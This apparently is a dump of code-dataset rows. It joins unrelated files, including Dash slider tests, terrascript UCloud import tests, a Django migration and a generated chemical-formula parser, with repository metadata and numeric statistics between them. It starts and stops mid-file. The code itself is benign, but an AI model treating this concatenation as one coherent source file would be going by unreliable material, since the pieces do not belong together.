value=[0, 65],
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100, marginTop=25),
),
html.Div(
dcc.RangeSlider(
min=0,
max=100,
value=[0, 65],
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.RangeSlider(
min=0,
max=100,
value=[0, 65],
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.RangeSlider(
min=0,
max=100,
value=[0, 65],
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.RangeSlider(
id="test-slider",
min=0,
max=100,
value=[0, 65],
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
],
style=dict(
maxHeight=300, overflowX="scroll", backgroundColor="#edf9f7"
),
)
]
)
dash_dcc.start_server(app)
dash_dcc.wait_for_element("#test-slider")
dash_dcc.percy_snapshot("slsl005- dcc.RangeSlider tooltip position")
def test_slsl006_drag_value_slider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
dcc.Slider(
id="slider",
min=0,
max=20,
step=1,
value=5,
tooltip={"always_visible": True},
),
html.Div(id="out-value"),
html.Div(id="out-drag-value"),
]
)
@app.callback(Output("out-drag-value", "children"), [Input("slider", "drag_value")])
def update_output(value):
return "You have dragged {}".format(value)
@app.callback(Output("out-value", "children"), [Input("slider", "value")])
def update_output(value):
return "You have selected {}".format(value)
dash_dcc.start_server(app)
slider = dash_dcc.find_element("#slider")
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 5")
dash_dcc.wait_for_text_to_equal("#out-drag-value", "You have dragged 5")
dash_dcc.click_and_hold_at_coord_fractions(slider, 0.25, 0.25)
dash_dcc.move_to_coord_fractions(slider, 0.75, 0.25)
dash_dcc.wait_for_text_to_equal("#out-drag-value", "You have dragged 15")
dash_dcc.move_to_coord_fractions(slider, 0.5, 0.25)
dash_dcc.wait_for_text_to_equal("#out-drag-value", "You have dragged 10")
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 5")
dash_dcc.release()
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 10")
def test_slsl007_drag_value_rangeslider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
dcc.RangeSlider(
id="slider",
min=0,
max=20,
step=1,
value=(5, 15),
tooltip={"always_visible": True},
),
html.Div(id="out-value"),
html.Div(id="out-drag-value"),
]
)
@app.callback(Output("out-drag-value", "children"), [Input("slider", "drag_value")])
def update_output(value):
value = value or (None, None)
return "You have dragged {}-{}".format(*value)
@app.callback(Output("out-value", "children"), [Input("slider", "value")])
def update_output(value):
return "You have selected {}-{}".format(*value)
dash_dcc.start_server(app)
slider = dash_dcc.find_element("#slider")
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 5-15")
dash_dcc.wait_for_text_to_equal("#out-drag-value", "You have dragged 5-15")
dash_dcc.click_and_hold_at_coord_fractions(slider, 0.25, 0.25)
dash_dcc.move_to_coord_fractions(slider, 0.5, 0.25)
dash_dcc.wait_for_text_to_equal("#out-drag-value", "You have dragged 10-15")
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 5-15")
dash_dcc.release()
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 10-15")
| 33.702265
| 88
| 0.473305
| 1,100
| 10,414
| 4.24
| 0.104545
| 0.081046
| 0.044811
| 0.057033
| 0.880789
| 0.869425
| 0.869425
| 0.869425
| 0.848628
| 0.848199
| 0
| 0.042199
| 0.406088
| 10,414
| 308
| 89
| 33.811688
| 0.711884
| 0
| 0
| 0.708955
| 0
| 0
| 0.143653
| 0.004609
| 0
| 0
| 0
| 0
| 0.007463
| 1
| 0.052239
| false
| 0
| 0.014925
| 0.018657
| 0.089552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d29ff363862bc8b7124f00dacbad38a2eb1530a2
| 215
|
py
|
Python
|
survey/surveys/metadata/__init__.py
|
vahndi/quant-survey
|
1a0fcf0c22e2c7306cba0218f82d24c97d28ee1f
|
[
"MIT"
] | 2
|
2021-04-10T21:50:36.000Z
|
2022-03-26T16:46:52.000Z
|
survey/surveys/metadata/__init__.py
|
vahndi/quant-survey
|
1a0fcf0c22e2c7306cba0218f82d24c97d28ee1f
|
[
"MIT"
] | 11
|
2020-08-30T18:47:14.000Z
|
2021-09-09T15:57:19.000Z
|
survey/surveys/metadata/__init__.py
|
vahndi/quant-survey
|
1a0fcf0c22e2c7306cba0218f82d24c97d28ee1f
|
[
"MIT"
] | null | null | null |
from survey.surveys.metadata.attribute_metadata import AttributeMetadata
from survey.surveys.metadata.category_metadata import CategoryMetadata
from survey.surveys.metadata.question_metadata import QuestionMetadata
| 53.75
| 72
| 0.902326
| 24
| 215
| 7.958333
| 0.458333
| 0.157068
| 0.267016
| 0.39267
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055814
| 215
| 3
| 73
| 71.666667
| 0.940887
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d2b5565041a638a681f80e4003643c17f88aac17
| 4,307
|
py
|
Python
|
tests/test_provider_ucloud_ucloud.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_ucloud_ucloud.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_ucloud_ucloud.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_ucloud_ucloud.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:29:33 UTC)
def test_provider_import():
import terrascript.provider.ucloud.ucloud
def test_resource_import():
from terrascript.resource.ucloud.ucloud import ucloud_cube_pod
from terrascript.resource.ucloud.ucloud import ucloud_db_instance
from terrascript.resource.ucloud.ucloud import ucloud_disk
from terrascript.resource.ucloud.ucloud import ucloud_disk_attachment
from terrascript.resource.ucloud.ucloud import ucloud_eip
from terrascript.resource.ucloud.ucloud import ucloud_eip_association
from terrascript.resource.ucloud.ucloud import ucloud_instance
from terrascript.resource.ucloud.ucloud import ucloud_isolation_group
from terrascript.resource.ucloud.ucloud import ucloud_lb
from terrascript.resource.ucloud.ucloud import ucloud_lb_attachment
from terrascript.resource.ucloud.ucloud import ucloud_lb_listener
from terrascript.resource.ucloud.ucloud import ucloud_lb_rule
from terrascript.resource.ucloud.ucloud import ucloud_lb_ssl
from terrascript.resource.ucloud.ucloud import ucloud_lb_ssl_attachment
from terrascript.resource.ucloud.ucloud import ucloud_memcache_instance
from terrascript.resource.ucloud.ucloud import ucloud_nat_gateway
from terrascript.resource.ucloud.ucloud import ucloud_nat_gateway_rule
from terrascript.resource.ucloud.ucloud import ucloud_redis_instance
from terrascript.resource.ucloud.ucloud import ucloud_security_group
from terrascript.resource.ucloud.ucloud import ucloud_subnet
from terrascript.resource.ucloud.ucloud import ucloud_udpn_connection
from terrascript.resource.ucloud.ucloud import ucloud_ufs_volume
from terrascript.resource.ucloud.ucloud import ucloud_uk8s_cluster
from terrascript.resource.ucloud.ucloud import ucloud_uk8s_node
from terrascript.resource.ucloud.ucloud import ucloud_us3_bucket
from terrascript.resource.ucloud.ucloud import ucloud_vip
from terrascript.resource.ucloud.ucloud import ucloud_vpc
from terrascript.resource.ucloud.ucloud import ucloud_vpc_peering_connection
from terrascript.resource.ucloud.ucloud import ucloud_vpn_connection
from terrascript.resource.ucloud.ucloud import ucloud_vpn_customer_gateway
from terrascript.resource.ucloud.ucloud import ucloud_vpn_gateway
def test_datasource_import():
from terrascript.data.ucloud.ucloud import ucloud_db_instances
from terrascript.data.ucloud.ucloud import ucloud_db_parameter_groups
from terrascript.data.ucloud.ucloud import ucloud_disks
from terrascript.data.ucloud.ucloud import ucloud_eips
from terrascript.data.ucloud.ucloud import ucloud_images
from terrascript.data.ucloud.ucloud import ucloud_instances
from terrascript.data.ucloud.ucloud import ucloud_lb_attachments
from terrascript.data.ucloud.ucloud import ucloud_lb_listeners
from terrascript.data.ucloud.ucloud import ucloud_lb_rules
from terrascript.data.ucloud.ucloud import ucloud_lb_ssls
from terrascript.data.ucloud.ucloud import ucloud_lbs
from terrascript.data.ucloud.ucloud import ucloud_nat_gateways
from terrascript.data.ucloud.ucloud import ucloud_projects
from terrascript.data.ucloud.ucloud import ucloud_security_groups
from terrascript.data.ucloud.ucloud import ucloud_subnets
from terrascript.data.ucloud.ucloud import ucloud_ufs_volumes
from terrascript.data.ucloud.ucloud import ucloud_us3_buckets
from terrascript.data.ucloud.ucloud import ucloud_vpcs
from terrascript.data.ucloud.ucloud import ucloud_vpn_connections
from terrascript.data.ucloud.ucloud import ucloud_vpn_customer_gateways
from terrascript.data.ucloud.ucloud import ucloud_vpn_gateways
from terrascript.data.ucloud.ucloud import ucloud_zones
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.ucloud.ucloud
#
# t = terrascript.provider.ucloud.ucloud.ucloud()
# s = str(t)
#
# assert 'https://github.com/ucloud/terraform-provider-ucloud' in s
# assert '1.29.0' in s
| 32.877863
| 80
| 0.812398
| 558
| 4,307
| 6.077061
| 0.195341
| 0.205249
| 0.281333
| 0.375111
| 0.823651
| 0.792097
| 0.787378
| 0.590091
| 0.099676
| 0
| 0
| 0.005366
| 0.134665
| 4,307
| 130
| 81
| 33.130769
| 0.904481
| 0.113072
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007692
| 0
| 1
| 0.052632
| true
| 0
| 1
| 0
| 1.052632
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
96056bed272ca67c9fd35114dae9757cf7a8f3bf
| 2,857
|
py
|
Python
|
saleor/unurshop/package/migrations/0008_auto_20200918_1533.py
|
nlkhagva/saleor
|
0d75807d08ac49afcc904733724ac870e8359c10
|
[
"CC-BY-4.0"
] | null | null | null |
saleor/unurshop/package/migrations/0008_auto_20200918_1533.py
|
nlkhagva/saleor
|
0d75807d08ac49afcc904733724ac870e8359c10
|
[
"CC-BY-4.0"
] | 1
|
2022-02-15T03:31:12.000Z
|
2022-02-15T03:31:12.000Z
|
saleor/unurshop/package/migrations/0008_auto_20200918_1533.py
|
nlkhagva/ushop
|
abf637eb6f7224e2d65d62d72a0c15139c64bb39
|
[
"CC-BY-4.0"
] | null | null | null |
# Generated by Django 3.1 on 2020-09-18 07:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('package', '0007_auto_20200916_1452'),
]
operations = [
migrations.RemoveField(
model_name='package',
name='total_gross_amount',
),
migrations.AddField(
model_name='package',
name='perkg_amount',
field=models.DecimalField(decimal_places=3, default=0, max_digits=12),
),
migrations.AlterField(
model_name='gaduurpackage',
name='actual_weight',
field=models.DecimalField(blank=True, decimal_places=3, max_digits=12, null=True),
),
migrations.AlterField(
model_name='gaduurpackage',
name='total_amount',
field=models.DecimalField(blank=True, decimal_places=3, max_digits=12, null=True),
),
migrations.AlterField(
model_name='gaduurpackage',
name='total_cost',
field=models.DecimalField(blank=True, decimal_places=3, max_digits=12, null=True),
),
migrations.AlterField(
model_name='gaduurpackage',
name='total_paid_amount',
field=models.DecimalField(blank=True, decimal_places=3, max_digits=12, null=True),
),
migrations.AlterField(
model_name='gaduurpackage',
name='total_weight',
field=models.DecimalField(blank=True, decimal_places=3, max_digits=12, null=True),
),
migrations.AlterField(
model_name='package',
name='gross_weight',
field=models.DecimalField(blank=True, decimal_places=3, max_digits=12, null=True),
),
migrations.AlterField(
model_name='package',
name='height',
field=models.DecimalField(blank=True, decimal_places=3, max_digits=12, null=True),
),
migrations.AlterField(
model_name='package',
name='length',
field=models.DecimalField(blank=True, decimal_places=3, max_digits=12, null=True),
),
migrations.AlterField(
model_name='package',
name='net_weight',
field=models.DecimalField(blank=True, decimal_places=3, max_digits=12, null=True),
),
migrations.AlterField(
model_name='package',
name='width',
field=models.DecimalField(blank=True, decimal_places=3, max_digits=12, null=True),
),
migrations.AlterField(
model_name='packageline',
name='unit_price_amount',
field=models.DecimalField(decimal_places=3, max_digits=12),
),
]
| 36.628205
| 95
| 0.576129
| 282
| 2,857
| 5.648936
| 0.205674
| 0.073446
| 0.173258
| 0.200251
| 0.792216
| 0.792216
| 0.756434
| 0.702448
| 0.702448
| 0.702448
| 0
| 0.034097
| 0.312216
| 2,857
| 77
| 96
| 37.103896
| 0.77659
| 0.015051
| 0
| 0.647887
| 1
| 0
| 0.111517
| 0.00841
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014085
| 0
| 0.056338
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82cdd768e390c8c1933ee27d570272fe87fa913b
| 275,486
|
py
|
Python
|
scripts/formula.py
|
DrewRJones/Metabolyze_Public
|
8ab8a659566ae367704417bde7834b28fb6ba363
|
[
"MIT"
] | null | null | null |
scripts/formula.py
|
DrewRJones/Metabolyze_Public
|
8ab8a659566ae367704417bde7834b28fb6ba363
|
[
"MIT"
] | null | null | null |
scripts/formula.py
|
DrewRJones/Metabolyze_Public
|
8ab8a659566ae367704417bde7834b28fb6ba363
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
import re
class TreeNode(object):
def __init__(self, text, offset, elements=None):
self.text = text
self.offset = offset
self.elements = elements or []
def __iter__(self):
for el in self.elements:
yield el
class TreeNode1(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode1, self).__init__(text, offset, elements)
self.element = elements[0]
self.count = elements[1]
class TreeNode2(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode2, self).__init__(text, offset, elements)
self.non_zero_digit = elements[0]
class ParseError(SyntaxError):
pass
FAILURE = object()
class Grammar(object):
REGEX_1 = re.compile('^[1-9]')
REGEX_2 = re.compile('^[0-9]')
def _read_formula(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['formula'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
address1 = self._read_term()
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['formula'][index0] = (address0, self._offset)
return address0
def _read_term(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['term'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_element()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_count()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = self._actions.make_term(self._input, index1, self._offset, elements0)
self._offset = self._offset
self._cache['term'][index0] = (address0, self._offset)
return address0
def _read_element(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['element'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 2]
if chunk0 == 'Zr':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Zr"')
if address0 is FAILURE:
self._offset = index1
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 2]
if chunk1 == 'Zn':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Zn"')
if address0 is FAILURE:
self._offset = index1
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 2]
if chunk2 == 'Yb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Yb"')
if address0 is FAILURE:
self._offset = index1
chunk3 = None
if self._offset < self._input_size:
chunk3 = self._input[self._offset:self._offset + 1]
if chunk3 == 'Y':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Y"')
if address0 is FAILURE:
self._offset = index1
chunk4 = None
if self._offset < self._input_size:
chunk4 = self._input[self._offset:self._offset + 2]
if chunk4 == 'Xe':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Xe"')
if address0 is FAILURE:
self._offset = index1
chunk5 = None
if self._offset < self._input_size:
chunk5 = self._input[self._offset:self._offset + 1]
if chunk5 == 'W':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"W"')
if address0 is FAILURE:
self._offset = index1
chunk6 = None
if self._offset < self._input_size:
chunk6 = self._input[self._offset:self._offset + 1]
if chunk6 == 'V':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"V"')
if address0 is FAILURE:
self._offset = index1
chunk7 = None
if self._offset < self._input_size:
chunk7 = self._input[self._offset:self._offset + 1]
if chunk7 == 'U':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"U"')
if address0 is FAILURE:
self._offset = index1
chunk8 = None
if self._offset < self._input_size:
chunk8 = self._input[self._offset:self._offset + 2]
if chunk8 == 'Tm':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Tm"')
if address0 is FAILURE:
self._offset = index1
chunk9 = None
if self._offset < self._input_size:
chunk9 = self._input[self._offset:self._offset + 2]
if chunk9 == 'Tl':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Tl"')
if address0 is FAILURE:
self._offset = index1
chunk10 = None
if self._offset < self._input_size:
chunk10 = self._input[self._offset:self._offset + 2]
if chunk10 == 'Ti':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ti"')
if address0 is FAILURE:
self._offset = index1
chunk11 = None
if self._offset < self._input_size:
chunk11 = self._input[self._offset:self._offset + 2]
if chunk11 == 'Th':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Th"')
if address0 is FAILURE:
self._offset = index1
chunk12 = None
if self._offset < self._input_size:
chunk12 = self._input[self._offset:self._offset + 2]
if chunk12 == 'Te':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Te"')
if address0 is FAILURE:
self._offset = index1
chunk13 = None
if self._offset < self._input_size:
chunk13 = self._input[self._offset:self._offset + 2]
if chunk13 == 'Tb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Tb"')
if address0 is FAILURE:
self._offset = index1
chunk14 = None
if self._offset < self._input_size:
chunk14 = self._input[self._offset:self._offset + 2]
if chunk14 == 'Ta':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ta"')
if address0 is FAILURE:
self._offset = index1
chunk15 = None
if self._offset < self._input_size:
chunk15 = self._input[self._offset:self._offset + 2]
if chunk15 == 'Sr':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Sr"')
if address0 is FAILURE:
self._offset = index1
chunk16 = None
if self._offset < self._input_size:
chunk16 = self._input[self._offset:self._offset + 2]
if chunk16 == 'Sn':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Sn"')
if address0 is FAILURE:
self._offset = index1
chunk17 = None
if self._offset < self._input_size:
chunk17 = self._input[self._offset:self._offset + 2]
if chunk17 == 'Sm':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Sm"')
if address0 is FAILURE:
self._offset = index1
chunk18 = None
if self._offset < self._input_size:
chunk18 = self._input[self._offset:self._offset + 2]
if chunk18 == 'Si':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Si"')
if address0 is FAILURE:
self._offset = index1
chunk19 = None
if self._offset < self._input_size:
chunk19 = self._input[self._offset:self._offset + 2]
if chunk19 == 'Se':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Se"')
if address0 is FAILURE:
self._offset = index1
chunk20 = None
if self._offset < self._input_size:
chunk20 = self._input[self._offset:self._offset + 2]
if chunk20 == 'Sc':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Sc"')
if address0 is FAILURE:
self._offset = index1
chunk21 = None
if self._offset < self._input_size:
chunk21 = self._input[self._offset:self._offset + 2]
if chunk21 == 'Sb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Sb"')
if address0 is FAILURE:
self._offset = index1
chunk22 = None
if self._offset < self._input_size:
chunk22 = self._input[self._offset:self._offset + 1]
if chunk22 == 'S':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"S"')
if address0 is FAILURE:
self._offset = index1
chunk23 = None
if self._offset < self._input_size:
chunk23 = self._input[self._offset:self._offset + 2]
if chunk23 == 'Ru':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ru"')
if address0 is FAILURE:
self._offset = index1
chunk24 = None
if self._offset < self._input_size:
chunk24 = self._input[self._offset:self._offset + 2]
if chunk24 == 'Rh':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Rh"')
if address0 is FAILURE:
self._offset = index1
chunk25 = None
if self._offset < self._input_size:
chunk25 = self._input[self._offset:self._offset + 2]
if chunk25 == 'Re':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Re"')
if address0 is FAILURE:
self._offset = index1
chunk26 = None
if self._offset < self._input_size:
chunk26 = self._input[self._offset:self._offset + 2]
if chunk26 == 'Rb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Rb"')
if address0 is FAILURE:
self._offset = index1
chunk27 = None
if self._offset < self._input_size:
chunk27 = self._input[self._offset:self._offset + 2]
if chunk27 == 'Pt':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Pt"')
if address0 is FAILURE:
self._offset = index1
chunk28 = None
if self._offset < self._input_size:
chunk28 = self._input[self._offset:self._offset + 2]
if chunk28 == 'Pr':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Pr"')
if address0 is FAILURE:
self._offset = index1
chunk29 = None
if self._offset < self._input_size:
chunk29 = self._input[self._offset:self._offset + 2]
if chunk29 == 'Pd':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Pd"')
if address0 is FAILURE:
self._offset = index1
chunk30 = None
if self._offset < self._input_size:
chunk30 = self._input[self._offset:self._offset + 2]
if chunk30 == 'Pb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Pb"')
if address0 is FAILURE:
self._offset = index1
chunk31 = None
if self._offset < self._input_size:
chunk31 = self._input[self._offset:self._offset + 1]
if chunk31 == 'P':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"P"')
if address0 is FAILURE:
self._offset = index1
chunk32 = None
if self._offset < self._input_size:
chunk32 = self._input[self._offset:self._offset + 2]
if chunk32 == 'Os':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Os"')
if address0 is FAILURE:
self._offset = index1
chunk33 = None
if self._offset < self._input_size:
chunk33 = self._input[self._offset:self._offset + 1]
if chunk33 == 'O':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"O"')
if address0 is FAILURE:
self._offset = index1
chunk34 = None
if self._offset < self._input_size:
chunk34 = self._input[self._offset:self._offset + 2]
if chunk34 == 'Ni':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
